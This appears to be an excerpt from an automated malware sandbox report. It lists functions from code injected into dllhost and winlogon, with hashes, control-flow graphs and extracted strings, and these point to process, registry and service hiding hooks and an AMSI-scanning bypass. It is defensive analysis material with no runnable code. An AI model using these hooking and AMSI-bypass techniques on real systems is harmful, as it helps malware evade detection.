                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID:
                              • API String ID: 756756679-0
                              • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction ID: dd7c4ac72d5c026372cbed03d50aa9230f7b7a5f3bdf86b428ecad56b97aa17f
                              • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction Fuzzy Hash: 0311A121601F9081EB25DBA6E908159A7A0FB99FC2F598025EF4E93764DF38D592C304
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction ID: 7cc3e49e006a54f78451ab734f67d6dbcd2643655b72cca602a0fa46560cc8a6
                              • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction Fuzzy Hash: 7CE03931601F14EAE728EBA2DC08389BAE1EB98B07F448024C90947350EF7D849AC740
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                              • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                              • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                              • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction ID: cffbb45a6b71b3921716ba97c6c4691b09ce31f5b25b7820658caf4daebb763b
                              • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction Fuzzy Hash: 5CE03931601A14DAE724CBA2DC08389BAE1EB98B07F45C024DA0947350EF7D9499C740
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction ID: ac1cea37960e3f86114e76bf06c5417d6c8a03991ff373a24603d2f3bd8e46b9
                              • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction Fuzzy Hash: C9E0ED71611F14EAE728EBA2DC08299BAB1FB98B17F448025C90947310EE38849AD614
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                              • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                              • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                              • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction ID: 5a18f94454edba8b3f9012ebf842908f8e43cf1d5d16e0885732ae35777ff7f8
                              • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction Fuzzy Hash: CDE06D71611914DAE728CBA2DC08288B6A1FB98B03F45C021DA0947350EE389498D610

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 2135414181-3414887735
                              • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction ID: c163acaebe60ea4311e68be09e509954e4c92294b53dd205c1ff3ab862208a51
                              • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction Fuzzy Hash: 4771133A724E61A6EB109FA9E85869D3374FB88B8AF909112DD4E57B68EF34C444C740

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                              • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                              • API String ID: 1735320900-4225371247
                              • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction ID: f29ca842126068601b63f5b890003817ffb932e00ebe5f9bb7d400ae7e1bf134
                              • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction Fuzzy Hash: 96519D6C568E6AB6EB01EFECEC5C7D93720A74474BFA0C593940A52175EF3C825AC340

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 151 225dc646270-225dc646297 152 225dc646299-225dc6462a8 151->152 153 225dc6462ab-225dc6462b6 GetCurrentThreadId 151->153 152->153 154 225dc6462b8-225dc6462bd 153->154 155 225dc6462c2-225dc6462c9 153->155 156 225dc6466ef-225dc646706 call 225dc648070 154->156 157 225dc6462db-225dc6462ef 155->157 158 225dc6462cb-225dc6462d6 call 225dc6460a0 155->158 161 225dc6462fe-225dc646304 157->161 158->156 164 225dc64630a-225dc646313 161->164 165 225dc6463d5-225dc6463f6 161->165 167 225dc64635a-225dc6463cd call 225dc644c50 call 225dc644bf0 call 225dc644bb0 164->167 168 225dc646315-225dc646358 call 225dc653a40 164->168 170 225dc6463fc-225dc64641c GetThreadContext 165->170 171 225dc64655f-225dc646570 call 225dc647bff 165->171 181 225dc6463d0 167->181 168->181 174 225dc64655a 170->174 175 225dc646422-225dc646443 170->175 185 225dc646575-225dc64657b 171->185 174->171 175->174 184 225dc646449-225dc646452 175->184 181->161 189 225dc6464d2-225dc6464e3 184->189 190 225dc646454-225dc646465 184->190 186 225dc646581-225dc6465d8 VirtualProtect FlushInstructionCache 185->186 187 225dc64663e-225dc64664e 185->187 191 225dc646609-225dc646639 call 225dc647fdc 186->191 192 225dc6465da-225dc6465e4 186->192 196 225dc64665e-225dc64666a call 225dc645530 187->196 197 225dc646650-225dc646657 187->197 193 225dc646555 189->193 194 225dc6464e5-225dc646503 189->194 198 225dc646467-225dc64647c 190->198 199 225dc6464cd 190->199 191->185 192->191 200 225dc6465e6-225dc646601 call 225dc644ad0 192->200 194->193 201 225dc646505-225dc646550 call 225dc644040 call 225dc647c1d 194->201 215 225dc64666f-225dc646675 196->215 197->196 203 225dc646659 call 225dc644b20 197->203 198->199 205 225dc64647e-225dc6464c8 call 225dc6440b0 SetThreadContext 198->205 199->193 200->191 201->193 203->196 205->199 216 225dc6466b7-225dc6466d5 215->216 217 225dc646677-225dc6466b5 ResumeThread call 225dc647fdc 215->217 220 225dc6466e9 216->220 221 225dc6466d7-225dc6466e6 216->221 217->215 220->156 221->220
                              APIs
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: Thread$Current$Context
                              • String ID:
                              • API String ID: 1666949209-0
                              • Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                              • Instruction ID: 295b081cb87bf85b7e110addeb5a6b591f47254ecbc1534d835875b48c3d2520
                              • Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                              • Instruction Fuzzy Hash: 6DD1AE3A20CF9891DA70DB9AE49835A77A0F3C8B89F108156EACE47769DF3DC551CB04

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 223 225dc641e3c-225dc641e60 LoadLibraryA GetProcAddress 224 225dc641e62-225dc641e6d SleepEx 223->224 225 225dc641e6f-225dc641e73 223->225 224->224
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProcSleep
                              • String ID: AmsiScanBuffer$amsi.dll
                              • API String ID: 188063004-3248079830
                              • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction ID: b943b4d4fec2722a97f31a6593bd222e515073a37d9d17746b47865a0752c427
                              • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction Fuzzy Hash: 02D0671C625E24F6EE186B9DE89C7543261AB68B03FE49455C50B012A0EE3C8559C340

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 1092925422-0
                              • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction ID: 5ab4cc4c86de14b28b7657dd2b04d766b10610f425967c1e4ffea0a6bb593b99
                              • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction Fuzzy Hash: B511422A619B50A3EB649B69E40821E77B0FB44B81F148036DE4E03794EB7DC954C784
                              APIs
                              Memory Dump Source
                              • Source File: 00000027.00000003.2452012682.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_3_225dc610000_winlogon.jbxd
                              Similarity
                              • API ID: Virtual$Protect$AllocLibraryLoad
                              • String ID:
                              • API String ID: 3316853933-0
                              • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction ID: 7c9ff1a1260ec0b76c18c2d9cc77086b54c9427e4fe21390ef94f9dc999a9e53
                              • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction Fuzzy Hash: 399126BAB02E6097EF648F69D409B6DB391F754FABF54C1349E4A07788DA38D812C700

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32 ref: 00000225DC643A35
                              • PathFindFileNameW.SHLWAPI ref: 00000225DC643A44
                                • Part of subcall function 00000225DC643F88: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64272F), ref: 00000225DC643FA0
                                • Part of subcall function 00000225DC643EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643EDB
                                • Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F0E
                                • Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F2E
                                • Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F47
                                • Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F68
                              • CreateThread.KERNELBASE ref: 00000225DC643A8B
                                • Part of subcall function 00000225DC641E74: GetCurrentThread.KERNEL32 ref: 00000225DC641E7F
                                • Part of subcall function 00000225DC641E74: CreateThread.KERNELBASE ref: 00000225DC642043
                                • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642049
                                • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642055
                                • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642061
                                • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC64206D
                                • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642079
                                • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642085
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                              • String ID:
                              • API String ID: 2779030803-0
                              • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction ID: 130d4905f5eea26d9371d1b1ff51420db667a30803bfba8bb2bd091ed1f53f6f
                              • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction Fuzzy Hash: F611B13D66CE29B2FB60ABEDE54D7AD3290AB84B47F50C0B99507811D0EF3DC484C600

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00000225DC641724: GetProcessHeap.KERNEL32 ref: 00000225DC64172F
                                • Part of subcall function 00000225DC641724: HeapAlloc.KERNEL32 ref: 00000225DC64173E
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417AE
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417DB
                                • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6417F5
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641815
                                • Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC641830
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641850
                                • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64186B
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64188B
                                • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418A6
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6418C6
                              • SleepEx.KERNELBASE ref: 00000225DC641BDF
                                • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418E1
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641901
                                • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64191C
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64193C
                                • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641957
                                • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641977
                                • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641992
                                • Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC64199C
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: CloseOpen$Heap$AllocProcessSleep
                              • String ID:
                              • API String ID: 948135145-0
                              • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction ID: 12f4e7bf2d043a765a3ac4f019d2c82d455fc7f3fa1118b40d32223ae48c856c
                              • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction Fuzzy Hash: 363135AD32CE61A1FB549BAED9583A933A4EB44BC6F04D4A18E0B973D5DF38C850C214

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 409 225dc67f370-225dc67f39f VirtualProtect
                              APIs
                              Memory Dump Source
                              • Source File: 00000027.00000002.3001527612.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                              • Associated: 00000027.00000002.3000144503.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.3002985016.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.3004370938.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.3005534775.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.3006762105.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc670000_winlogon.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                              • Instruction ID: a9a0868b07df84503d79fe2f89049b18ceebf10007afb1c3b1b6b2ac5b3c783d
                              • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                              • Instruction Fuzzy Hash: 91D01229731950D3F300DF51D8497956328F79C702FD08005E94AC6694DF7CC259CB51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 408 225dc64f370-225dc64f39f VirtualProtect
                              APIs
                              Memory Dump Source
                              • Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                              • Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                              • Instruction ID: 91454ba34573355ff24e871c1f84efd327f9d9e1a896de9ceab491d5d3354271
                              • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                              • Instruction Fuzzy Hash: 4CD01229735950D3E300DF61D8497966328F39C702FD08005E98A82694DF7CC259CB50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 410 225dc67d220-225dc67d22f 411 225dc67d23f-225dc67d24f 410->411 412 225dc67d231-225dc67d23d 410->412 414 225dc67d266-225dc67d27e HeapAlloc 411->414 412->411 413 225dc67d282-225dc67d28d call 225dc67d1f4 412->413 419 225dc67d28f-225dc67d294 413->419 415 225dc67d280 414->415 416 225dc67d251-225dc67d258 call 225dc6806d0 414->416 415->419 416->413 422 225dc67d25a-225dc67d264 call 225dc67b470 416->422 422->413 422->414
                              APIs
                              Memory Dump Source
                              • Source File: 00000027.00000002.3001527612.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                              • Associated: 00000027.00000002.3000144503.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
